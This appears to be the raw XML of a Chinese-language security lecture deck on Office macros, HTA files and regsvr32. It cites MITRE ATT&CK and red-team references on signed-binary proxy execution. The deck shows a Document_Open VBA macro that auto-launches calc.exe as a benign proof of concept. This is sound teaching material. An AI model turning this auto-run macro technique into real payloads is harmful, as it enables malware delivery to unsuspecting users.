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316" r:id="rId4"/>
    <p:sldId id="314" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="319" r:id="rId12"/>
    <p:sldId id="320" r:id="rId13"/>
    <p:sldId id="296" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="262" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="317" r:id="rId19"/>
    <p:sldId id="315" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="278" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="283" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="295" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="282" r:id="rId36"/>
    <p:sldId id="306" r:id="rId37"/>
    <p:sldId id="307" r:id="rId38"/>
    <p:sldId id="298" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="311" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="312" r:id="rId44"/>
    <p:sldId id="313" r:id="rId45"/>
    <p:sldId id="304" r:id="rId46"/>
    <p:sldId id="310" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="309" r:id="rId4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sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="58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F84778-0DEC-40D3-AF05-AF8AA8C78C8B}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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510C7-8E11-4210-AFE0-C4D0D7C8E503}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2253112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FD77D64F-9C70-4962-A210-CBA4E6DF258D}" type="datetime1">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594AABD-FA9A-4595-B0DC-B43C8EC57D89}"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B8AEEF3F-F455-402E-B42B-2A1DB41EECA8}" type="datetime1">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594AABD-FA9A-4595-B0DC-B43C8EC57D8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95F1672-33BE-4C01-9E4B-7B544EFCD467}" type="datetime1">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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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06030452-769B-43FE-98D0-197A9E90093F}" type="datetime1">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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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3CE24B06-1862-46F4-9F75-159D4D8C5C93}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}"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58373CD1-5E63-4956-AD2B-E736D373E2DB}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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AFC9859-9BAF-4EF7-B58C-181885B65E6C}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}"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E3C4AC89-023B-45DF-BDBB-69142242ECC0}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}"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4F5C551-B51A-4BB0-A2BF-B496A76A9C75}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D8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6825E79-0A0D-486E-857F-6CC984E5ED64}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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C0A2A8C-D6DA-4B74-BC30-1D45D29992C0}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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48A0838-7123-4074-9A48-FF158C913FB5}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2023/4/7</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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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ttack.mitre.org/techniques/T1059/005/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.investopedia.com/terms/v/visual-basic-for-applications-vba.a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2.kimep.kz/bcb/teachers/~vlasov/BCA/vba/vbtutorial.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utomateexcel.com/vba/shel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anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bdd" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.599cd.com/tips/hta/beginner/B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hyperwrite.com.au/Articles/html_applications.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.sevagas.com/?Hacking-around-HTA-files" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/shuteer_xu/article/details/11269074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virusbulletin.com/virusbulletin/2017/03/vb2016-paper-one-click-fileless-infectio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so.csdn.net/so/search?q=%E6%B3%A8%E5%86%8C%E8%A1%A8&amp;spm=1001.2101.3001.7020" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/HTML" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/JScript" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Microsoft_Windows" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/VBScript" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_Explorer" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/HTML_Application" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Dynamic_HTML" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/Zlirving_/article/details/11398354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yberonesecurity.com/blog/abusing-mshta-exe-to-gain-powershell-access" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bd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599cd.com/tips/hta/beginner/B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microsoft.com/en-us/windows-server/administration/windows-commands/assoc" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftype" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://superuser.com/questions/1322203/trying-to-run-an-hta-gives-this-app-cant-run-on-your-pc"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599cd.com/tips/hta/beginner/B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599cd.com/tips/hta/beginner/B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599cd.com/tips/hta/beginner/B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hyperlink" Target="https://www.cyberonesecurity.com/blog/abusing-mshta-exe-to-gain-powershell-acces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log.trendmicro.com.tw/?tag=fileless-malwar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dium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bd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dium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bd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dium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bd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edium.com/@anht_59851/html-application-hta-a-gui-for-your-scripting-on-windows-bfaacf2c3bdd"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erverfault.com/questions/835433/what-does-regsvr32-do" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682162(v=vs.85).asp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ile.net/process/regsvr32.exe.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/desktop/com/com-glossary"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Regsvr32" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Dynamic-link_library" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/64-bit" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/ReactOS" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/32-bit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Windows_Registry" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/ActiveX"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Regsvr32" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/w/index.php?title=Ldconfig&amp;action=edit&amp;redlink=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thelp.ithome.com.tw/m/articles/1026570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support.microsoft.com/en-us/topic/how-to-use-the-regsvr32-tool-and-troubleshoot-regsvr32-error-messages-a98d960a-7392-e6fe-d90a-3f4e0cb543e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uperuser.com/questions/414472/what-does-regsvr32-i-shell32-dll-do" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Regsvr3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attack.mitre.org/techniques/T1218/010/"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blog.trendmicro.com.tw/?p=51589" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fileinspect.com/fileinfo/scrobj-dl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blog.trendmicro.com.tw/?p=51589" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-dllinstal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lolbas-project.github.io/lolbas/Binaries/Regsvr32/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/010/"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ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo"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mcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1218-signed-binary-proxy-execution/untitled-2"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hyperlink" Target="https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1218-signed-binary-proxy-execution/untitled-2"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zh-tw/office/vba/language/reference/user-interface-help/shell-function" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/office/vba/api/word.document.open" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.automateexcel.com/vba/shel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smtClean="0"/>
              <a:t>Macro, HTA, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>regsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 32</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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594AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2007711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imgur.com/mOzi4b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538961"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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="3956178"/>
            <a:ext cx="3528392" cy="1844824"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>存檔完打開後會出現已經停用巨集，因為預設不是啟用的。所以如果有個麻瓜不知道這按下去可能會執行某個程式就開啟小算盤了。</a:t>
            </a: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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>巨集</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1252168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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Visual Basic for Applications is a computer programming language developed and owned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>VBA is an event-driven programming language built into Microsoft Office, as well as several third-party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>enables documents to contain macros used to automate the execution of tasks and other functionality on the host.</a:t>
            </a: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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Visual Basic for Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(VBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>WILL KENTON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MITRE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="714148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VBA is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>interpreted language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>interpreted languages, each line of the program is interpreted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>executed when the program is run. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>VBA Interpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>kimep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="432947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We can use the VBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> function to call a separate, executable program from inside a VBA program. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example, if we need to open Notepad from Excel, we can use the VBA Shell function to do so.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the Shell call succeeds, it returns the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TaskID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> value of the program it called. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>the Shell call fails, it returns zero.</a:t>
            </a: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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>VBA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>automateexcel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1138177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2675467"/>
            <a:ext cx="9036496" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Document_Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a = Shell("C:\Windows\System32\calc.exe")</a:t>
            </a:r>
          </a:p>
